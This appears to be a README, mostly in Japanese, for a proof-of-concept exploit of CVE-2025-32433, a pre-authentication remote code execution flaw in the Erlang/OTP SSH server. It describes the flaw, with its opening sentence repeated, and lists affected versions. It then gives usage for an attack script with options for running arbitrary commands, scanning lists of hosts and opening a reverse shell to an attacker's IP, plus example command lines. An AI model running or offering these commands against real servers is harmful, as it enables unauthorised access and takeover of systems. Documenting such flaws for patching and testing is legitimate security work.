
この脆弱性により、ネットワークアクセスを持つ攻撃者は、事前認証なしでErlang/OTP SSHサーバー上で任意のコードを実行できます。
この脆弱性により、Erlang/OTP SSH サーバーにネットワーク経由でアクセスできる攻撃者は、事前の認証なしに任意のコードを実行できます。
Erlang/OTP SSH サーバーに、認証なしのリモートコード実行(RCE)を攻撃者に許す可能性がある深刻な脆弱性が確認されました。SSH プロトコルのメッセージ処理における欠陥を悪用することで、悪意のある攻撃者は有効な認証情報なしに影響を受けるシステムへ不正アクセスし、任意のコマンドを実行できる可能性があります。これにより、該当ホストが侵害され、第三者が機密データへの不正アクセスや改ざんを行う可能性や、サービス拒否(DoS)攻撃につながる可能性があります。
OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier
python cve-2025-32433.py <host> [options]
オプション:
-p PORT, --port PORT: SSH port (default: 22)
-t TIMEOUT, --timeout TIMEOUT: Connection timeout in seconds (default: 5)
-c COMMAND, --command COMMAND: Custom command to execute
--check: Check if the target is vulnerable
-u urls.txt, --urlfile urls.txt: File containing list of hosts to scan (one per line)
-o output.txt, --output output.txt: Output file to store results.
--shell: Launch a reverse shell
--lhost LHOST: Attacker's IP for reverse shell
--lport LPORT: Attacker's port for reverse shell (default: 4444)
python cve-2025-32433.py 127.0.0.1 --check
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444